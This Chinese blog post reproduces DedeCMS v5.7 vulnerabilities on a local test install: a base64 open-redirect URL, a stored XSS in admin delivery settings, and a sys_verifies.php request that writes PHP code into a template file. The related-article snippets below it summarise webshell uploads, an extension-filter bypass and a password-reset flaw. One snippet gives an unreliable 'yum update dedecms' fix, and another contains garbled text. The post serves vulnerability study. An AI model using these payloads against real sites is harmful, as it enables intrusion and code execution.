DedeCMS_v5.7其他漏洞复现

最新推荐文章于 2025-03-21 16:00:05 发布
最新推荐文章于 2025-03-21 16:00:05 发布
阅读量752 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wutiangui/article/details/132828757
版权

一、URL重定向
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20=
其中aHR0cDovL3d3dy5iYWlkdS5jb20=是http://www.baidu.com的base64编码
在这里插入图片描述

访问后发现直接转到百度
在这里插入图片描述

二、后台shops_delivery_存储型XSS
管理员在添加用户购买商品的配送方式时,可能会触发存储型xss
模拟管理员添加配送方式:
进入后台—>会员—>配货方式设置—>增加一个配货方式
在这里插入图片描述

输入
在这里插入图片描述

用户在购买商品时会自动弹出配送方式列表
在这里插入图片描述在这里插入图片描述

在这里插入图片描述在这里插入图片描述

另外如果网页无法打开可以在后台更新内容
在这里插入图片描述

三、sys_verifies后台文件写入
版本:5.7sp1、5.7sp2
漏洞复现
payload
http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/sys_verifies.php?action=getfiles&refiles[]=123&refiles[]=%22;phpinfo();die();//
执行后出现以下页面
在这里插入图片描述

后台modifytmp.inc被写入了新内容
在这里插入图片描述

DedeCMS V5.7文件上传漏洞复现
weixin_51047454的博客
03-20 1540
CVE-2018-20129-DedeCMS V5.7 SP2前台文件上传漏洞复现 登录管理页面后,开启会员功能(默认是关闭的) 回到首页,用户登录后,点击会员中心。 打开内容中心(第一次进入会提示完善个人信息,完善一下,不然不能操作) 重点开始 4. 发表文章的表单最下方有一个图片的图标,点击可以选择上传图片到服务端。 制作图片码 上传 抓包修改文件后缀:p*hp 连接,成功 代码审计 为什么用.ph%p就可以绕过检测了?我们来看看源码中的问题部分。 找到图片的校验部分的源
DedeCMS漏洞复现
qq_52223347的博客
03-10 1117
介绍 织梦CMS是集简单、健壮、灵活、开源几大特点的开源内容管理系统,目前占领了国内开源CMS的大部份市场,目前已经有超过三十万个站点正在使用织梦CMS或基于织梦CMS核心开发。 官方网站: http://www.dedecms.com/ 环境搭建 phpstudy 创建数据库 解压源码到www下 Dedecms_v5.7ps2 访问 DedeCMS/uploads/install/index.php 安装 安装完成–》登陆后台 任意文件操作漏洞复现 进到网站后台–》访问 dede/tpl.php?act
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3950
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
DedeCMS_v5.7漏洞复现
qq_51459600的博客
04-06 1万+
DedeCMS_v5.7漏洞复现 环境搭建: 服务器:WinServer2008(10.10.10.143) + phpstudy2018 DedeCMS版本:DedeCMS-V5.7-UTF8-SP2 下载地址:https://pan.baidu.com/s/1GQjWSDe7IlMVsVJ7HvrBOw 提取码: i4wk 0x01 URL重定向 版本<=5.7sp2 漏洞复现 payload: http://10.10.10.143/Dedecms/plus/download.php?open
DedeCMS V5.7前台文件上传漏洞(CVE-2018-20129)
最新发布
m0_65761158的博客
03-21 777
安装PHPstudy导入源码打开软件后,点击网站,自己新建一个网站,随便起一个域名如:www.xxx.xom随后点击管理进入部署的网站的根目录, 将事先准备的DedeCMS的源码包解压,并将uploads文件夹复制进根目录中。按照提示继续,直到出现用户界面,这里的数据库密码来自于phpstudy中数据库的密码,还要记住你自己的用户名及密码,之后会登录会需要,然后继续即可。返回地址是:/DedeCMS/uploads/uploads/allimg/240527/1-24052H31ITP.php。
DedeCMS-V5.7.82-UTF8织梦管理系统漏洞
weixin_57240513的博客
08-03 711
将靶场环境放到www目录下——访问/dedecms/uploads同意协议——继续继续配置后——点击继续进入后台登录后台——填写用户名密码。
DeDeCMS-漏洞复现
weixin_57682301的博客
08-03 703
2.上传后访问你上传的一句话木马文件 我这里写的一句话木马为phpinfo,显示成功即可证明注入。4.点击生成--更新主页html,将htm后缀改成php并且生成静态,点击更新主页html。5.访问此页面,没有报错证明注入成功(由于没有回显,这里输入的POST传参)1.点击核心--文件式管理器 点击文件上传,将我们的一句话木马进行上传。2.进入后点击模板--默认模板管理,找到index.htm。3.点击右方的编辑进入后改成写入的一句话木马,然后点击保存。1.点击模板--广告管理--生成一个新广告。
织梦dedecms漏洞修复大全(5.7起)
weixin_30472035的博客
12-30 892
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题. 好,我们来一个一个修复。修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦。如果你搜索不到,...
DedeCms织梦系统漏洞复现
LIU6636LIU的博客
03-13 2893
1 部署好之后发现系统默认管理路径是dede,登陆管理后台可以通过地址然后有dedecms安全提示直接打开根目录修改dede文件夹为LYP重新进去管理员后台对数据进行还原看一下网站的地址接着生成新的网站然后即可访问网站,CMS搭建完毕首先打开后台管理页面开启会员功能这样就可以注册一个账户。
CMS V5.7 SP2漏洞复现(CVE-2018-20129)
haoaaao的博客
04-04 4993
0x00 前置 1、CVE中对该漏洞的描述: 在 DedeCMS V5.7 SP2 中发现了一个问题。uploads/include/dialog/select_images_post.php 允许远程攻击者通过双扩展名和修改的“.php”子字符串以及 image/jpeg 内容类型上传和执行任意 PHP 代码,如 filename=1 所示。 jpg.p*hp 值。 2、所需工具 (1)cms网站源码版本:DedeCMS V5.7 SP2 下载链接...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
m0_60466340的博客
11-28 797
漏洞概述 1.漏洞简介 织梦内容管理系统(DedeCms),以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 2018 年 1 月 10 日, 锦行信息安全公众号公开了一个关...
dedecms v5.7越权漏洞复现
xxxMIng的博客
12-28 2168
环境搭建: 在win7x64上安装phpstudy 将网站源码 放置于C:\phpStudy\PHPTutorial\WWW\dedecms 并启动phpstudy 将运行模式放在系统服务上 应用 从物理机上访问该地址的index.php网页 进行下一步继续设定数据密码为root 管理员登陆 admin 密码 admin 点击继续即可完成搭站 ...
dedecms v5.7(build 20150618)的12个漏洞
热门推荐
ccfxue的博客
06-28 1万+
一打开阿里云后台,发现了12个加急处理的漏洞,还没来得及了解阿里云的漏洞检测原理,直接开始着手修复漏洞searching on baidu... ...  : )1.dedecms支付模块注入漏洞 描述:DEDECMS支付插件存在SQL注入漏洞,此漏洞存在于/include/payment/alipay.php文件中,对输入参数$_GET['out_trade_no']未进行严格过滤。解决:找到 ...
dedecms5.7 sp2前台修改任意用户密码漏洞复现
weixin_46801402的博客
07-29 979
DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 dedecms5.7 sp2允许用户修改任意前台用户的密码,不能对管理员账户造成影响,毕竟管理员账户与前台用户的数据表时分开存放的。而且,前台也不能直接登录管理员账户...
漏洞复现--织梦CMS_V5.7任意用户密码重置漏洞
HengMengSec的博客
08-16 2517
织梦内容管理系统(DeDeCMS)以其简单、实用、开源的特点而著名。作为国内最知名的PHP开源网站管理系统,它在多年的发展中取得了显著进步,无论在功能还是易用性方面都有长足的发展。该系统广泛应用于中小型企业门户网站、个人网站、企业和学习网站建设。在中国,DedeCMS被认为是最受欢迎的CMS系统之一。但是,最近发现该系统的一个漏洞位于member/resetpassword.php文件中。由于未对接收的参数safeanswer进行严格的类型判断,攻击者可以利用弱类型比较来绕过安全措施。
织梦CMS_V5.7任意用户密码重置漏洞复现
wutiangui的博客
09-12 1088
漏洞位于member/resetpassword.php文件中,因未对传入的参数safeanswer进行严格类型检查,导致可使用弱类型比较绕过。在代码分析中,当 d o p o s t 等于 s a f e q u e s t i o n 时,通过传入的 dopost等于safequestion时,通过传入的 dopost等于safequestion时,通过传入的mid查询用户信息,判断安全问题和答案是否匹配。输入新密码,比如admin,然后登录试下,发现登录成功,数据库里查到的也是admin。
DeDeCMS漏洞复现
cheapkiller的博客
08-03 321
点击-》 【 index.htm 】 --> 【模板】 --》 【默认模板管理】 【修改】 在⽂件修改中添加⼀句话代码。点击 【模块】--》 【⼴告管理】 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添加加⼀句话代码--》点击 【确定】添加完成后点击【代码】在图中显示的路径与站点进⾏拼接....访问测试!上传文件上传一句话木马然后打开即可。然后更新html后缀名改为php。打开成功后在蚁剑工具中进行连接。打开环境登陆后台进行修改文件。文件内容写一个可以执行的内容。添加的内容写入一句话木马。
DeDeCMS漏洞复现(基于PHP搭建)
2301_79638144的博客
11-07 1385
dedecms平台搭建及漏洞复现
DedeCMS-V5.7-UTF8-SP2漏洞
01-04
### 关于DedeCMS V5.7 UTF8 SP2版本安全漏洞详情 #### 前台任意用户密码修改漏洞DedeCMS v5.7 SP2 版本中存在前台任意用户密码修改漏洞,此漏洞允许攻击者通过特定请求路径绕过正常的身份验证流程来更改任何用户的密码。这一行为严重威胁到系统的安全性以及数据隐私[^2]。 对于该漏洞的具体实现细节,在`album_add.php` 文件内并未直接涉及核心逻辑处理部分;而是由于其他地方存在的设计缺陷所引发的问题。通常情况下,此类问题源于输入校验不足或是权限控制机制上的疏漏[^1]。 #### 环境搭建与测试条件 为了重现上述提到的漏洞现象并进行进一步研究,可以基于推荐配置——Linux操作系统搭配Apache服务器、PHP解释器(建议选用5.2至5.3版本之间)、MySQL数据库管理系统建立相应的运行环境[^3]。 值得注意的是,虽然官方文档提供了较为宽松的技术栈兼容范围说明,但在实际操作过程中仍需注意不同组件间可能产生的适配性差异。 ### 修复措施 针对已知的安全隐患,采取如下改进方案: - **加强身份认证**:确保每次敏感操作前都严格检查当前会话状态的有效性和合法性; - **完善参数过滤**:对来自客户端的所有输入进行全面清洗,防止恶意构造的数据进入业务逻辑层; - **更新补丁程序**:及时安装由开发者发布的最新安全修补包,以获得更好的防护效果。 ```bash # 更新命令示例 (假设使用yum作为包管理工具) sudo yum update dedecms ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值